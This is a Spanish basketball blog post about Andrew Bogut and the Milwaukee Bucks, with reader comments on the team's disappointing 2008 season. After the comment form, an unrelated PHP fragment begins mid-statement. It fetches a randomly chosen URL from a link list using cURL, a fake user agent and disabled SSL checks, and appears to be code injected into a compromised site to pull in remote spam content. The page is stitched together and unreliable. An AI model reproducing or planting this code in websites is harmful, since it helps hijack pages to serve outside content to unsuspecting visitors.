Los amigos invisibles de Andrew Bogut

28 de March de 2008 por txusma

Partido igualado. Concentración máxima. Te encaminas hacia la línea de tiro libre. El árbitro te pasa el balón. Botas la pelota 3 veces. Miras la canasta. Levantas los brazos. Tiras y… !dentro! Ahora vendrán todos mis compañeros a felicitarme. ¿Cómo? ¿Qué no? Pues no pasa nada. Como si hubieran venido.

Comenta

9 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

    ¡Qué crack!

      Citar

  2. TheDeerHunter dice:
    #2

    Vaya banda los bucks… es para matarlos

      Citar

  3. MagicJohnson32 dice:
    #3

    Una decepción enorme, sí. De lo peor de la temporada, y mira que es difícil hacerlo tan rematadamente mal en el Este.

      Citar

  4. Gallis dice:
    #4

    Pues fijate que, cuando jugaba medio en serio, yo pedía a mis compañeros que no se me acercaran en los tiros libres, no me gustaba…tampoco es que hubiera mucho que celebrar, jojojojo…

    Y a mi juicio, el “problema” de los Bucks es que un equipo con mucha medianía decente. Y Redd me parece un muy buen jugador, pero no llega a la categoría de jugador capaz de tirar del carro, creo. Sería una gran segunda opción…no sé, Villanueva, Bogut, Mo Williams, etc, serían grandes jugadores de acompañamiento, pero es que en Milwaukee hay poco que acompañar, jeje.

      Citar

  5. MagicJohnson32 dice:
    #5

    A mí no me importaba que viniesen los compañeros a chocar la mano después del tiro libre. Eso sí, yo no me movía ni un milímetro de la línea. Aunque la verdad es que tiraba muy pocos tiros libres. Lo mío era el 6,25 jojo.

    Socio, dime equipos del Este, a parte de los obvios (los 4 primeros más alguno suelto), con jugadores para tirar del carro.

      Citar

  6. TheDeerHunter dice:
    #6

    Pues a priori, a un equipo con Maurice Williams – Michael Redd – Bobby Simmons – Charlie Villanueva – Andrew Bogut y con Charlie Bell – Desmond Mason – Yi Jianlian parece que se le podría exigir algo más…
    de hecho, lo han demostrado en más de un partido. Pero lo que pasa ahí, como en algún otro equipo del este de cuyo nombre no quiero acordarme es de expediente-X.
    Yo no digo que se tuvieran que clasificar para play-offs (que tal y como ha ido de barato el pescao, tampoco digo que no) pero hacer el ridículo de esa forma y emitir el mal rollo que desprenden, pues…

      Citar

  7. MagicJohnson32 dice:
    #7

    Joer, pues claro que tendrían que clasificarse para los Playoffs. Por dios, si puede ser suficiente con ganar ¡¡¡35 partidos!!!

    Es que es tremendo, Sacramento sería 8º en el Este, pffff.

      Citar

  8. Gallis dice:
    #8

    A ver, que no niego que puedan que estar en playoffs, porque es cierto que en el este hay lo que hay, pero para mí hay demasiada horchata en las venas de muchos jugadores…no les tengo fe a los Simmons, Bell, Villanueva y compañia…y sabeís que, pese al bombo que se le dió, siempre he dudado que Bogut vaya a ser alguien importante en la liga…

    Vamos, que a mi me pilla por sorpresa el batacazo de Chicago, incluso si me apuras, esperaba algo más de los Bobcats…el de Milwaukee también me sorprende, pero mucho menos.

      Citar

  9. Viva_Dirk dice:
    #9

    Los Bucks no han sabido decidirse, después de una buena decisión siempre ha llegado una mala. Eligieron a Bogut en el draft y le obligaron a jugar casi todo el año de 4 porque ficharon a Magloire, hicieron un buen cambio entre TJ Ford y Villanueva, pero después eligieron al chino quitandole protagonismo a Charlie, cuando tenian aleros para elegir.

    A parte de que a dia de hoy su entrenador jefe aspira al premio del peor del año. De lo último que dice Gallis, yo veo a Bogut All-Star muy pronto y siendo un factor determinante.

    Mucho mas decepcionante Chicago desde luego, lo de Charlotte ha sido mas relacionado con las lesiones.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>